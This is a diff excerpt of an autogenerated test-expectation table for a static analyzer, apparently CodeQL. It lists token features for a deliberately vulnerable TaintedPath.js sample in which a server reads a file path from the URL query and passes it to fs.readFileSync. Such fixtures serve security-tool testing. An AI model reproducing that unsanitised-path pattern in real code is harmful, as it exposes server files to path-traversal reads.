http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | 'arguments' object of anonymous function | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | 'arguments' object of anonymous function | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | (ev) => ... ata);\\n} | CalleeFlexibleAccessPath | addEventListener | | autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | (ev) => ... ata);\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | (ev) => ... ata);\\n} | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | (ev) => ... ata);\\n} | contextSurroundingFunctionParameters | (ev) | | autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | (ev) => ... ata);\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | exceptional return of anonymous function | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | exceptional return of anonymous function | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | return of anonymous function | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | return of anonymous function | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:95:29:97:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:95:30:95:31 | ev | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:95:30:95:31 | ev | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:95:30:95:31 | ev | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:95:30:95:31 | ev | contextSurroundingFunctionParameters | (ev) | +| autogenerated/TaintedPath/TaintedPath.js:95:30:95:31 | ev | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:95:30:95:31 | ev | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:95:30:95:31 | ev | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:95:30:95:31 | ev | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:95:30:95:31 | ev | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:95:30:95:31 | ev | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:8 | Cookie | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:8 | Cookie | contextSurroundingFunctionParameters | (ev) | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:8 | Cookie | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:8 | Cookie | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:8 | Cookie | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:12 | Cookie.set | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:12 | Cookie.set | contextSurroundingFunctionParameters | (ev) | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:12 | Cookie.set | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:12 | Cookie.set | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:12 | Cookie.set | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:31 | Cookie. ... v.data) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:31 | Cookie. ... v.data) | contextSurroundingFunctionParameters | (ev) | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:31 | Cookie. ... v.data) | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:31 | Cookie. ... v.data) | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:31 | Cookie. ... v.data) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:31 | exceptional return of Cookie. ... v.data) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:31 | exceptional return of Cookie. ... v.data) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:31 | exceptional return of Cookie. ... v.data) | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:31 | exceptional return of Cookie. ... v.data) | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:96:3:96:31 | exceptional return of Cookie. ... v.data) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:96:10:96:12 | set | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:96:10:96:12 | set | contextSurroundingFunctionParameters | (ev) | +| autogenerated/TaintedPath/TaintedPath.js:96:10:96:12 | set | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:96:10:96:12 | set | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:96:10:96:12 | set | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:96:14:96:21 | "unsafe" | CalleeFlexibleAccessPath | Cookie.set | | autogenerated/TaintedPath/TaintedPath.js:96:14:96:21 | "unsafe" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:96:14:96:21 | "unsafe" | contextFunctionInterfaces | views_local(req, res) | @@ -5484,6 +61432,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:96:14:96:21 | "unsafe" | enclosingFunctionName | addEventListener#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:96:14:96:21 | "unsafe" | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:96:14:96:21 | "unsafe" | receiverName | Cookie | +| autogenerated/TaintedPath/TaintedPath.js:96:24:96:25 | ev | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:96:24:96:25 | ev | contextSurroundingFunctionParameters | (ev) | +| autogenerated/TaintedPath/TaintedPath.js:96:24:96:25 | ev | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:96:24:96:25 | ev | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:96:24:96:25 | ev | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:96:24:96:30 | ev.data | CalleeFlexibleAccessPath | Cookie.set | | autogenerated/TaintedPath/TaintedPath.js:96:24:96:30 | ev.data | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:96:24:96:30 | ev.data | contextFunctionInterfaces | views_local(req, res) | @@ -5492,6 +61445,62 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:96:24:96:30 | ev.data | enclosingFunctionName | addEventListener#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:96:24:96:30 | ev.data | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:96:24:96:30 | ev.data | receiverName | Cookie | +| autogenerated/TaintedPath/TaintedPath.js:96:27:96:30 | data | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:96:27:96:30 | data | contextSurroundingFunctionParameters | (ev) | +| autogenerated/TaintedPath/TaintedPath.js:96:27:96:30 | data | enclosingFunctionBody | ev Cookie set unsafe ev data | +| autogenerated/TaintedPath/TaintedPath.js:96:27:96:30 | data | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:96:27:96:30 | data | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:5:99:10 | server | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:5:99:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:5:99:10 | server | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:5:109:2 | server ... );\\n\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:5:109:2 | server ... );\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:5:109:2 | server ... );\\n\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:14:99:17 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:14:99:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:14:99:17 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:14:99:30 | http.createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:14:99:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:14:99:30 | http.createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:14:109:2 | exceptional return of http.cr ... );\\n\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:14:109:2 | exceptional return of http.cr ... );\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:14:109:2 | exceptional return of http.cr ... );\\n\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:14:109:2 | http.cr ... );\\n\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:14:109:2 | http.cr ... );\\n\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:14:109:2 | http.cr ... );\\n\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:19:99:30 | createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:19:99:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:19:99:30 | createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | this | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:31 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:32 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:32 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:32 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:32 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:32:99:32 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | functio ... );\\n\\n} | CalleeFlexibleAccessPath | http.createServer | | autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | functio ... );\\n\\n} | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | functio ... );\\n\\n} | calleeImports | http | @@ -5499,6 +61508,89 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | functio ... );\\n\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | functio ... );\\n\\n} | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | functio ... );\\n\\n} | receiverName | http | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:32:109:1 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:41:99:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:41:99:43 | req | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:41:99:43 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:41:99:43 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:41:99:43 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:41:99:43 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:41:99:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:41:99:43 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:41:99:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:41:99:43 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:99:46:99:48 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:9 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:9 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:9 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:9 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:9 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:47 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:47 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:47 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:47 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:47 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:47 | path = ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:47 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:47 | path = ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:47 | path = ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:6:100:47 | path = ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:15 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:15 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:15 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:15 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:15 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:21 | url.parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:21 | url.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:21 | url.parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:21 | url.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:21 | url.parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:36 | exceptional return of url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:36 | exceptional return of url.par ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:36 | exceptional return of url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:36 | exceptional return of url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:36 | exceptional return of url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:36 | url.par ... , true) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:36 | url.par ... , true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:36 | url.par ... , true) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:36 | url.par ... , true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:36 | url.par ... , true) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:42 | url.par ... ).query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:42 | url.par ... ).query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:42 | url.par ... ).query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:42 | url.par ... ).query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:42 | url.par ... ).query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:47 | url.par ... ry.path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:47 | url.par ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:47 | url.par ... ry.path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:47 | url.par ... ry.path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:13:100:47 | url.par ... ry.path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:17:100:21 | parse | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:17:100:21 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:17:100:21 | parse | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:17:100:21 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:17:100:21 | parse | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:23:100:25 | req | contextFunctionInterfaces | views_local(req, res) | +| 